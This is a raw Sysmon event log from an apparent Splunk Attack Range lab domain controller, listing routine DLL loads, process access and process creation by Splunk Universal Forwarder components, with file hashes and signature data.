(rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54,IMPHASH=AFF2E9AF6DD20912DC1E604BDBCA3761trueMicrosoft WindowsValid 734700x800000000000000099208Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:45.865{326FD73D-C0ED-6294-380B-000000005502}4048C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 734700x800000000000000099207Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:45.865{326FD73D-C0ED-6294-380B-000000005502}4048C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3,IMPHASH=070F257E4632BC576557C4085595EAA4trueMicrosoft WindowsValid 734700x800000000000000099206Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:45.865{326FD73D-C0ED-6294-380B-000000005502}4048C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9,IMPHASH=2CB5DA5225E972A08F32D04B8085DC7EtrueMicrosoft CorporationValid 734700x800000000000000099205Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:45.865{326FD73D-C0ED-6294-380B-000000005502}4048C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=AD564ED89D67D88709AA5980BAE20604,SHA256=0EEBE5AA750667908006742E133AE1C273D966897B95B1A0E63826450BB4780A,IMPHASH=A48DFE6DD98128BE3EB687CBF2724A44trueSplunk, Inc.Valid 734700x800000000000000099204Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:45.865{326FD73D-C0ED-6294-380B-000000005502}4048C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2zaOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=B28B29D2F85EB8349BFB5E7214D7F4D5,SHA256=17260ACBE55D8988E598ECEFBC60140EBE057336B47D8089444588321F067280,IMPHASH=838F909F0A52D977E0B8662364FA0BFEtrueSplunk, Inc.Valid 734700x800000000000000099203Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:45.865{326FD73D-C0ED-6294-380B-000000005502}4048C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0,IMPHASH=76A5AA3DF6083D853F576403C8F841A8trueMicrosoft WindowsValid 734700x800000000000000099202Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:45.865{326FD73D-C0ED-6294-380B-000000005502}4048C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=98C643DECFE1971BE3E8B076B19BFD72,SHA256=A520C20F316C902985449BC17AB5F86FCF2F41420B08C1AE08BA06E767EB49F3,IMPHASH=464BF3FDF330E6A15D24CC679EF7F72EtrueSplunk, Inc.Valid 734700x800000000000000099201Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:45.865{326FD73D-C0ED-6294-380B-000000005502}4048C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=9BC99DECE580BD163AC318FCD1ACB667,SHA256=94BA08021E14476ED8EC2DC81165574B64274E20F2D8DE9CA98CD0D10CE279F7,IMPHASH=3295DC2518E43BEF226F8847873D20C2trueSplunk, Inc.Valid 734700x800000000000000099200Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:45.865{326FD73D-C0ED-6294-380B-000000005502}4048C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\rpcrt4.dll10.0.14393.5125 (rs1_release.220429-1732)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=E22D365A75901B1AED4B2A329FC3B5EC,SHA256=70073F203292301E5B6854DED0F9150B97F2E81A2E12FF40C81E978382B8D2CB,IMPHASH=154EA5DE40F0F2475E943DE8013E5692trueMicrosoft WindowsValid 734700x800000000000000099199Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:45.865{326FD73D-C0ED-6294-380B-000000005502}4048C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=FBA0D04D5A8AEA25D86EC623A14D0056,SHA256=D64FE508393C40160D1EFB22149C69763CBAA921BD1BC74C8D4AE59A10C3B767,IMPHASH=987AB6B8B03EE421D8CC59EAFE452916trueSplunk, Inc.Valid 734700x800000000000000099198Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:45.865{326FD73D-C0ED-6294-380B-000000005502}4048C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2zaOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=0FE6D3D4B3F4B0F5502371832D12BB8E,SHA256=3DF79909021C72E70D2AE273587296E5E2D5F77315011B5C3115CFA359682647,IMPHASH=E09B42A7EA1725DA2CD99223AD969C63trueSplunk, Inc.Valid 734700x800000000000000099197Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:45.865{326FD73D-C0ED-6294-380B-000000005502}4048C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\sechost.dll10.0.14393.5006 (rs1_release.220301-1704)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=9F0F4C38A22FC9FFB8814F77A9563680,SHA256=E9ABDA1063716301F5D06DBC94D6A35B3F53A14B946525E5F764485132DB6166,IMPHASH=D6E06125849E8565A50F366A0149FB40trueMicrosoft WindowsValid 734700x800000000000000099196Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:45.865{326FD73D-C0ED-6294-380B-000000005502}4048C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3,IMPHASH=57ABD1FDE351971A01E912069E11B44CtrueMicrosoft WindowsValid 734700x800000000000000099195Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:45.865{326FD73D-C0ED-6294-380B-000000005502}4048C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.10libxml2 librarylibxml2-libxml2.dllMD5=20596DB2126E9F188727597F0FCC7CDB,SHA256=BAD6246A2B43B07FE80643DE40B0CE49751C8E0B95B076AD94E59F16CE8D8C0C,IMPHASH=6DA659461618DB73B9BD17D114677D20trueSplunk, Inc.Valid 734700x800000000000000099194Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:45.865{326FD73D-C0ED-6294-380B-000000005502}4048C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438,IMPHASH=C7DF3F2CF025F0BEDA797705E4F4AFBBtrueMicrosoft WindowsValid 734700x800000000000000099193Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:45.865{326FD73D-C0ED-6294-380B-000000005502}4048C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4,IMPHASH=07D6F84E3C8FD0D2C32F9398A0369BAFtrueMicrosoft WindowsValid 734700x800000000000000099192Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:45.865{326FD73D-C0ED-6294-380B-000000005502}4048C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\fltLib.dll10.0.14393.0 (rs1_release.160715-1616)Filter LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationfilterLib.dllMD5=051ABD8360BDA63A1BC77C662FBF0A25,SHA256=C914E2DBAEC2C9A11923A984B30A979637D3A27B3C29E93F4C90FB1D9FBC518F,IMPHASH=74D3C2DA8B6F9861866B866AE40683D3trueMicrosoft WindowsValid 734700x800000000000000099191Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:45.865{326FD73D-C0ED-6294-380B-000000005502}4048C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=C42106182CCA611F629E46981D1A0EEA,SHA256=68C134F95A8D38AE84545C8D581F4BF808B6C9D97513EA3CABF019C66419CBAE,IMPHASH=B511E4B82A44D3731CDA46A74F5D57EAtrueMicrosoft WindowsValid 10341000x800000000000000099190Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:45.865{326FD73D-A44C-6294-0901-000000005502}53725392C:\Windows\system32\conhost.exe{326FD73D-C0ED-6294-380B-000000005502}4048C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x800000000000000099189Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:45.865{326FD73D-C0ED-6294-380B-000000005502}4048C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\KernelBase.dll10.0.14393.5125 (rs1_release.220429-1732)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=D8F18C830B03B0D60C10093ECB020E60,SHA256=CF0D33CEC46BB41C6F5693A84491ACD7F7CBECB429BA6C47AB5A170D4DF3484F,IMPHASH=05349EBAA635D77714868763D44881E9trueMicrosoft WindowsValid 734700x800000000000000099188Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:45.865{326FD73D-C0ED-6294-380B-000000005502}4048C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\kernel32.dll10.0.14393.5066 (rs1_release.220401-1841)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=E258A076D1B87D41F724E431B3293BA5,SHA256=0670462AC0932F314B2E4A0A20B4B6F96C024C2310BD2AF21B20BF7A8EC9FF8E,IMPHASH=3CE0779E0F4E275CD51A359A98CCC682trueMicrosoft WindowsValid 734700x800000000000000099187Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:45.865{326FD73D-C0ED-6294-380B-000000005502}4048C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\ntdll.dll10.0.14393.5006 (rs1_release.220301-1704)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F5EE39B17A8BCDEDC3D40997C26F62B1,SHA256=11C1C88B1CC11D9800DEEF27ED7ABDFDE3DC852687A3B9FBD5153284106E5952,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 734700x800000000000000099186Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:45.865{326FD73D-C0ED-6294-380B-000000005502}4048C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exeMD5=679D3E04F6AB7B10FF27D06B29C27A12,SHA256=FF1B5220C99EA6173BE693E1C2D700873ADE2F8A73F503FC0D297EA0792756D1,IMPHASH=05D58741E22C6453F52C1A9326FAF02DtrueSplunk, Inc.Valid 10341000x800000000000000099185Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:45.865{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099184Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:45.865{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099183Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:45.865{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099182Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:45.865{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099181Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:45.865{326FD73D-A252-6294-0500-000000005502}416432C:\Windows\system32\csrss.exe{326FD73D-C0ED-6294-380B-000000005502}4048C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000099180Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:45.865{326FD73D-A44C-6294-0501-000000005502}51646008C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{326FD73D-C0ED-6294-380B-000000005502}4048C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000099179Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:45.866{326FD73D-C0ED-6294-380B-000000005502}4048C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{326FD73D-A253-6294-E703-000000000000}0x3e70SystemMD5=679D3E04F6AB7B10FF27D06B29C27A12,SHA256=FF1B5220C99EA6173BE693E1C2D700873ADE2F8A73F503FC0D297EA0792756D1,IMPHASH=05D58741E22C6453F52C1A9326FAF02D{326FD73D-A44C-6294-0501-000000005502}5164C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000099178Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:45.021{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C0D3BC61915422DA7864D87E13E70E5,SHA256=8886B1D73BAABF2E47645F75FAD83AD82B405B72B4CCF23C8452FA7A743106CA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 734700x800000000000000099279Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:46.896{326FD73D-C0EE-6294-390B-000000005502}1276C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FE,IMPHASH=9E9C9DFD04CDDF2B6F1412BF096AEAF4trueMicrosoft WindowsValid 734700x800000000000000099278Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:46.896{326FD73D-C0EE-6294-390B-000000005502}1276C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862,IMPHASH=C918D75BDB7774C087BB6C0C9C0A7686trueMicrosoft WindowsValid 734700x800000000000000099277Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:46.896{326FD73D-C0EE-6294-390B-000000005502}1276C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778C,IMPHASH=96CBD1B5C0EA88B677BA3BB5FD009869trueMicrosoft WindowsValid 734700x800000000000000099276Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:46.896{326FD73D-C0EE-6294-390B-000000005502}1276C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\srvcli.dll10.0.14393.5066 (rs1_release.220401-1841)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=75E3DE473374E0BCBBD1EC60036A93EC,SHA256=23EBE577D2080D4C7532184B69E44BF640BB44084F9046A5AF364268A7BDB1EC,IMPHASH=6CC8301D560C9DC6CB13A6320F3A3B1FtrueMicrosoft WindowsValid 734700x800000000000000099275Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:46.896{326FD73D-C0EE-6294-390B-000000005502}1276C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74,IMPHASH=7C2E79D83754439DC7DE7882DCB4238DtrueMicrosoft WindowsValid 734700x800000000000000099274Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:46.896{326FD73D-C0EE-6294-390B-000000005502}1276C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\wkscli.dll10.0.14393.5066 (rs1_release.220401-1841)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3D375474E2FE9A77D243E35954287188,SHA256=7850F11166D7CACED6F628033524ED86191AE92772000AFA677E59A664396E8C,IMPHASH=6990BA83B94C81786A84E6C44E699D03trueMicrosoft WindowsValid 734700x800000000000000099273Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:46.896{326FD73D-C0EE-6294-390B-000000005502}1276C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923,IMPHASH=7D1B32891B9173ED71ED6C18DEFEE578trueMicrosoft WindowsValid 734700x800000000000000099272Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:46.896{326FD73D-C0EE-6294-390B-000000005502}1276C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\netapi32.dll10.0.14393.5125 (rs1_release.220429-1732)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=E8FF656B90334BED915B2BC6BBE57C9A,SHA256=8BB399AD98B9D9C637D09EB48306B1E80C50BAA7D1C9811595D9042E4294173C,IMPHASH=FE007B4B6CED5075C98434207FFF87E0trueMicrosoft WindowsValid 734700x800000000000000099271Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:46.896{326FD73D-C0EE-6294-390B-000000005502}1276C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft 